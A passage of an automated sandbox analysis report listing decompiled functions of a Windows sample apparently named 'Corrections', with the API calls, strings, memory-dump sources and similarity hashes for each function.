Part of subcall function 0098E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0098D7CD,?), ref: 0098E72D

lstrcmpiW.KERNEL32(?,?), ref: 0098D7F0
MoveFileW.KERNEL32(?,?), ref: 0098D82A
_wcslen.LIBCMT ref: 0098D8B0
_wcslen.LIBCMT ref: 0098D8C6
SHFileOperationW.SHELL32(?), ref: 0098D90C

Strings

\*.*, xrefs: 0098D89E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 876e4984a5b71cb90b8cd7c88ace5f6050511ae36ca5649a0495f8ee003dca57
Instruction ID: 9b4d43c7cb9bd6d6d395e769a55e8ce8161db905356555d9deb529a46167f2a5
Opcode Fuzzy Hash: 876e4984a5b71cb90b8cd7c88ace5f6050511ae36ca5649a0495f8ee003dca57
Instruction Fuzzy Hash: DA4137719062189EDF16FFA4D985FDD77BCAF44340F1004E6E545E7281EA35A788CB50

Function 009B3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 009B38B8
GetWindowLongW.USER32(?,000000F0), ref: 009B38EB
GetWindowLongW.USER32(?,000000F0), ref: 009B3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 009B3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 009B397C
GetWindowLongW.USER32(?,000000F0), ref: 009B398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009B39A7

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: f07e378f3eb84d3f272cc7294279c777e387ab2ef5094ceb9e91c71d459261d0
Instruction ID: 9c8d088b4c1b7d538015473839f2ae48e7c4a50e2ee24ad158e5852fb1699fc8
Opcode Fuzzy Hash: f07e378f3eb84d3f272cc7294279c777e387ab2ef5094ceb9e91c71d459261d0
Instruction Fuzzy Hash: 65311534619255EFDB21CF58DE85FA837E5FB8A720F1542A4F5108B2B1CBB1A984EB01

Function 0098808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009880D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009880F6
SysAllocString.OLEAUT32(00000000), ref: 009880F9
SysAllocString.OLEAUT32(?), ref: 00988117
SysFreeString.OLEAUT32(?), ref: 00988120
StringFromGUID2.OLE32(?,?,00000028), ref: 00988145
SysAllocString.OLEAUT32(?), ref: 00988153

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 023fae40b873a09940636fa9cf5d34a11c0973288800bea74a992f422d7ee643
Instruction ID: d77a9813e4ab816e4bf3fcc9f070f3c2883299aede5f08c18dbc72ba053ff05f
Opcode Fuzzy Hash: 023fae40b873a09940636fa9cf5d34a11c0973288800bea74a992f422d7ee643
Instruction Fuzzy Hash: 6E219772609219AF9F10EFA8CC88DBB73ACEB093647448525F905DB390DE74DD468770

Function 00988164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009881A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009881CF
SysAllocString.OLEAUT32(00000000), ref: 009881D2
SysAllocString.OLEAUT32 ref: 009881F3
SysFreeString.OLEAUT32 ref: 009881FC
StringFromGUID2.OLE32(?,?,00000028), ref: 00988216
SysAllocString.OLEAUT32(?), ref: 00988224

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 54f8b2ce59e12c3d5457d73a548e76e087189cab98ef7e7dc4e20df4fa8e3f46
Instruction ID: 7bc3c5166df372704f9f4a3c18449ad07c9776b4f3230a56f58cada380897738
Opcode Fuzzy Hash: 54f8b2ce59e12c3d5457d73a548e76e087189cab98ef7e7dc4e20df4fa8e3f46
Instruction Fuzzy Hash: CF217171609204BF9B10ABA8DC89DAB77ECEB493607448125F915CB2A0EF74EC41DB74

Function 00990E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00990E99
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00990ED5

Strings

nul, xrefs: 00990F0E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 2f53d6a0118a00d978cd0f4b2615386fb55df7c7b1a10c20935beceedf7536d9
Instruction ID: aeb0b7d363a1993f109c50c690408f99113351f113dfc348e88b97f5b576c58b
Opcode Fuzzy Hash: 2f53d6a0118a00d978cd0f4b2615386fb55df7c7b1a10c20935beceedf7536d9
Instruction Fuzzy Hash: D021607150430AAFDF208F6DDC08A9A7BA8BF94764F204A69FCB5E72D0E7709940DB50

Function 00990F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00990F6D
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00990FA8

Strings

nul, xrefs: 00990FE0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 8c330ac2b2e483f5d987575f97417a861b55dcf174af91b9177082ef6b5cb0bc
Instruction ID: 9d9ed48256adc19af4c48a60fe343e03a2b827281263b925d55779d6e65d3a6d
Opcode Fuzzy Hash: 8c330ac2b2e483f5d987575f97417a861b55dcf174af91b9177082ef6b5cb0bc
Instruction Fuzzy Hash: E3214A71604346AFDF249F6C8D05A9AB7A8BF96734F200B19F8B1E32D0E7719980DB50

Function 009B4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00927873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009278B1
Part of subcall function 00927873: GetStockObject.GDI32(00000011), ref: 009278C5
Part of subcall function 00927873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009278CF

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009B4BB0
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009B4BBD
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009B4BC8
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009B4BD7
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009B4BE3

Strings

Msctls_Progress32, xrefs: 009B4B81

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 58d6faeef843b09d9065603e6c7e3e2a960a8a12cb4eead56e75532ce72df4a4
Instruction ID: 245881c654f3a5db807dd3e2035d7557da5669d72f9818422059fead4824e7cc
Opcode Fuzzy Hash: 58d6faeef843b09d9065603e6c7e3e2a960a8a12cb4eead56e75532ce72df4a4
Instruction Fuzzy Hash: DA1193B1550219BEEF119FA5CC85EEB7F5DEF087A8F014110B608A6050CA71DC21DBA0

Function 0095DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0095DB23: _free.LIBCMT ref: 0095DB4C

_free.LIBCMT ref: 0095DBAD

Part of subcall function 00952D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4), ref: 00952D4E
Part of subcall function 00952D38: GetLastError.KERNEL32(009F1DC4,?,0095DB51,009F1DC4,00000000,009F1DC4,00000000,?,0095DB78,009F1DC4,00000007,009F1DC4,?,0095DF75,009F1DC4,009F1DC4), ref: 00952D60

_free.LIBCMT ref: 0095DBB8
_free.LIBCMT ref: 0095DBC3
_free.LIBCMT ref: 0095DC17
_free.LIBCMT ref: 0095DC22
_free.LIBCMT ref: 0095DC2D
_free.LIBCMT ref: 0095DC38

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction ID: fd5f73355be96607845d11ad9138902019dd3bd883efa398a22b9a3932a0596f
Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
Instruction Fuzzy Hash: 0F118172542B04BAD530FBB2DC07FCB77ED9F96702F400D19BA99AA192DA74B5088750

Function 0098E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0098E328
LoadStringW.USER32(00000000), ref: 0098E32F
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0098E345
LoadStringW.USER32(00000000), ref: 0098E34C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0098E390

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0098E36D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 8ff99d4916d8fdc7bf82bb1fa710ab1fe415e6035dd2b5588aaa76537b773a6b
Instruction ID: 350c06b4d380f1c8dba643d9a271a8e21b158f35fc4380aaec97b44b48fa9b83
Opcode Fuzzy Hash: 8ff99d4916d8fdc7bf82bb1fa710ab1fe415e6035dd2b5588aaa76537b773a6b
Instruction Fuzzy Hash: 520186F6904208BFE711A7A4DE89EEB776CD708710F0046A2B746E6041F6749E845B75

Function 00991312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00991322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00991334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00991342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00991350
CloseHandle.KERNEL32(00000000), ref: 0099135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 0099136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00991376

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 3c9555ad5c800e84250fa6640b281716b60e352c8f2698e648e850a6f7f2154b
Instruction ID: 222976a055938a8563b2751b4fe088c88b046b30ec0961f87fefdd4713ab5900
Opcode Fuzzy Hash: 3c9555ad5c800e84250fa6640b281716b60e352c8f2698e648e850a6f7f2154b
Instruction Fuzzy Hash: 07F0EC3205B612BBD7451B54EF49BD6BB39FF04316F401221F101918A0A7749471EF90

Function 009A26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 009A281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 009A283E
WSAGetLastError.WSOCK32 ref: 009A284F
htons.WSOCK32(?,?,?,?,?), ref: 009A2938
inet_ntoa.WSOCK32(?), ref: 009A28E9

Part of subcall function 0098433E: _strlen.LIBCMT ref: 00984348

Part of subcall function 009A3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0099F669), ref: 009A3C9D

_strlen.LIBCMT ref: 009A2992

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 201e8695ce1a0698712069c48f8fef79eec19145e8d0a66fb650e386bd413d53
Instruction ID: 113ff7f8617eedc3fad500040fff6518306130102cebd41dfb68eedbd757d0d9
Opcode Fuzzy Hash: 201e8695ce1a0698712069c48f8fef79eec19145e8d0a66fb650e386bd413d53
Instruction Fuzzy Hash: 60B1C075604301AFD324DF28C885F2AB7E9AF89318F54854CF49A5B2E2DB31EE41CB91

Function 00950527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0095042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00950446
__allrem.LIBCMT ref: 0095045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0095047B
__allrem.LIBCMT ref: 00950492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009504B0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 4d8cc2b0d75a166479db7bf73b8c85fceff4d68bc2e76570ec3007360e35322c
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 36811A72600B0A9BD724EF6ACC81B6E73E8AFC4725F24452AFD11D7691F770D9088B94

Function 00956571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00948649,00948649,?,?,?,009567C2,00000001,00000001,8BE85006), ref: 009565CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009567C2,00000001,00000001,8BE85006,?,?,?), ref: 00956651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0095674B
__freea.LIBCMT ref: 00956758

Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5

__freea.LIBCMT ref: 00956761
__freea.LIBCMT ref: 00956786

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: c130f06ddb1dfd95acb9c141e245b021b73a4d26f0e052ed7ebb0d1d7d514e11
Instruction ID: 6f16d63ad1fb357e564740f68c02900119ec9002a0d831ba41999b35ba020940
Opcode Fuzzy Hash: c130f06ddb1dfd95acb9c141e245b021b73a4d26f0e052ed7ebb0d1d7d514e11
Instruction Fuzzy Hash: 9B51EF72610206ABEB24CF66CC81FBA7BAAEB88755F544668FC04D7140EB35DC58C7A0

Function 009AC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009AC785
RegCloseKey.ADVAPI32(00000000), ref: 009AC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009AC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 009AC853
RegCloseKey.ADVAPI32(?), ref: 009AC85F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 03081a5c4a2193110b6c6faacc1152e2345b33c12b2f5881e454d58a93988371
Instruction ID: b9668c4191f8ce67dea127a827944988c1f9ba8f49a96f311d5e7a0fbe5e54dd
Opcode Fuzzy Hash: 03081a5c4a2193110b6c6faacc1152e2345b33c12b2f5881e454d58a93988371
Instruction Fuzzy Hash: D6818EB5208241AFD714DF24C885F2ABBE9FF85308F14895CF5598B2A2DB31ED45CB92

Function 0098009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 009800A9
SysAllocString.OLEAUT32(00000000), ref: 00980150
VariantCopy.OLEAUT32(00980354,00000000), ref: 00980179
VariantClear.OLEAUT32(00980354), ref: 0098019D
VariantCopy.OLEAUT32(00980354,00000000), ref: 009801A1
VariantClear.OLEAUT32(?), ref: 009801AB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: bf340a61bfa3d222218c7bcbd5c54f3c968a9376746642be9086cd1731ff6570
Instruction ID: 7361c21b18a95c8f5852eb957142906590aedafff892ff0be9fe179ed9a9f574
Opcode Fuzzy Hash: bf340a61bfa3d222218c7bcbd5c54f3c968a9376746642be9086cd1731ff6570
Instruction Fuzzy Hash: 3551D635614310AADFA0BF64D889B2DB3A9EFC5310F148446F906DF396DAB49C48CB56

Function 00999B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00999F2A
_wcslen.LIBCMT ref: 00999F4B
_wcslen.LIBCMT ref: 00999F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00999FCA

Strings

X, xrefs: 00999E57

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 6292b0167846a3742d6cf35d5253bbf5de893562c4a9f4487a40c81f6ec06b34
